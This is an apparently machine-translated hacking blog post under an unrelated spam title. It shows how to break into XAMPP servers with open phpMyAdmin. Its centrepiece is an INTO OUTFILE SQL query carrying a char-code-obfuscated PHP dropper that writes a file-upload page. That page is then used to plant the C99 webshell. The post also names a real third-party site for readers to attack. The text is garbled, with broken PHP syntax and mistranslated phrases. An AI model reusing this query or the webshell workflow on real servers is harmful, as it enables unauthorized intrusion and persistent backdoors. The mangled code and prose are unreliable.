Sunday, March 6, 2011

How Can I Hook My Cb Radio To My Cigarette Plug

vehicles XAMPP FAIL AGAIN!

Recalling my experiences some time ago, I decided to read some old posts and one of them was
intrusion to a server through
XAMPP, so I thought I do some tests to see if it worked this technique, well my friend @ yoyahack, made an entry on his blog explaining how the
INTO OUTFILE , more information Explanation INTO OUTFILE a SQL injection.
sought to find a site that had enabled the visualization of phpmyadmin
by anonymous users. Once inside the phpmyadmin
, I opened the phpinfo to see where information was located the installation folder because we will need later when creating the malicious file. In this case, is in the following path: # SCRIPT_FILENAME C: / xampp / htdocs / xampp / phpinfo.php
#
 

Then we build and run a query in MySQL within phpmyadmin

as follows, in order to create a file that will allow us to upload a WebShell.
Figure 1. The query that is run following
shows the execution of the query.

#
SELECT '\u0026lt;? Php $ file = crearcadena (array (115,117,98,101,116,101,46,112,104,112));
$contenido=crearcadena(array(60,63,112,104,112,13,10,105,110,105,95,115,101,116,40,39,117,112,108,111,97,100,95,109,97,
    120,95,102,105,108,101,115,105,122,101,39,44,39,49,48,48,77,39,41,59,13,10,105,110,105,95,115,101,116,40,39,112,111,115, 
116,95,109,97,120,95,115,105,122,101,39,44,39,49,48,48,77,39,41,59,13,10,47,47,32,115,99,114,105,112,116,32,100,101,32,
117,112,108,111,97,100,13,10,36,115,116,97,116,117,115,32,61,32,34,69,114,114,111,114,34,59,13,10,47,47,32,111,98,116,101,
110,101,109,111,115,32,108,111,115,32,100,97,116,111,115,32,100,101,108,32,97,114,99,104,105,118,111,13,10,36,116,97,109,
97,110,111,32,61,32,36,95,70,73,76,69,83,91,34,97,114,99,104,105,118,111,34,93,91,39,115,105,122,101,39,93,59,13,10,36,116,
105,112,111,32,61,32,36,95,70,73,76,69,83,91,34,97,114,99,104,105,118,111,34,93,91,39,116,121,112,101,39,93,59,13,10,36,
97,114,99,104,105,118,111,32,61,32,36,95,70,73,76,69,83,91,34,97,114,99,104,105,118,111,34,93,91,39,110,97,109,101,39,93,
59,13,10,36,115,116,97,116,117,115,61,34,34,59,13,10,105,102,32,40,36,97,114,99,104,105,118,111,32,33,61,32,34,34,41,32,123,
13,10,47,47,32,103,117,97,114,100,97,109,111,115,32,101,108,32,97,114,99,104,105,118,111,32,97,32,108,97,32,99,97,114,112,
101,116,97,32,102,105,108,101,115,13,10,36,100,101,115,116,105,110,111,32,61,32,36,97,114,99,104,105,118,111,59,13,10,105,
102,32,40,99,111,112,121,40,36,95,70,73,76,69,83,91,39,97,114,99,104,105,118,111,39,93,91,39,116,109,112,95,110,97,109,101,
39,93,44,36,100,101,115,116,105,110,111,41,41,32,123,13,10,36,115,116,97,116,117,115,32,61,32,34,65,114,99,104,105,118,111,32,
115,117,98,105,100,111,58,32,34,46,36,97,114,99,104,105,118,111,46,34,34,59,13,10,125,32,101,108,115,101,32,123,13,10,36,115,
116,97,116,117,115,32,61,32,34,69,114,114,111,114,32,97,108,32,115,117,98,105,114,32,101,108,32,97,114,99,104,105,118,111,34,32,
46,36,97,114,99,104,105,118,111,59,13,10,125,13,10,125,32,101,108,115,101,32,123,13,10,36,115,116,97,116,117,115,32,61,32,34,
69,114,114,111,114,32,110,111,32,104,97,121,32,97,114,99,104,105,118,111,34,59,13,10,125,13,10,101,99,104,111,32,36,115,
116,97,116,117,115,59,13,10,63,62,13,10,60,104,116,109,108,62,13,10,60,104,101,97,100,62,13,10,60,47,104,101,97,100,62,13,10,
60,98,111,100,121,62,13,10,60,102,111,114,109,32,97,99,116,105,111,110,61,34,34,32,109,101,116,104,111,100,61,34,80,79,83,84,
34,32,101,110,99,116,121,112,101,61,34,109,117,108,116,105,112,97,114,116,47,102,111,114,109,45,100,97,116,97,34,62,13,10,60,
105,110,112,117,116,32,116,121,112,101,61,34,102,105,108,101,34,32,110,97,109,101,61,34,97,114,99,104,105,118,111,34,62,13,
10,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,32,110,97,109,101,61, 34,115,117,98,109,105,
116,34,32,118,97,108,117,101,61,34,101,110,118,105,97, 114,34,62,13,10,60,47,102,111,114,109,62,13,10,60,47,98,111,100,
121.62, 13,10,60,47,104,116,109,108,62));
$ fp = fopen ($ file, crearcadena (array (97)));
$ write = fputs ($ fp, $ content);
fclose ($ fp);
crearcadena function (array $ values) {
if ($ values) {
foreach ($ values \u200b\u200bas $ value) {$ str .= chr
($ value);

}} return
$ str;}
?> '
INTO OUTFILE' C: / xampp / htdocs / upload.php "
#


is now only enter the PATH

file anymore subete.php so would # #
http://PATH/subete.php
 

We found an upload where we can upload any kind of file, this time climb the shell
C99.php
.
Figure 2. Image
where we climbed the file shows.

Now we WebShell within the server and can move between directories and much more.
Figure 3. WebShell Inage of action.

already have everything and we still use our imagination to see that we him.
I leave a site to practice
snet.net.pk / xampp / , no fucking idea what is web.

Greetings to all the fucking especially
@ Kevin
Progressive Death alias.

0 comments:

Post a Comment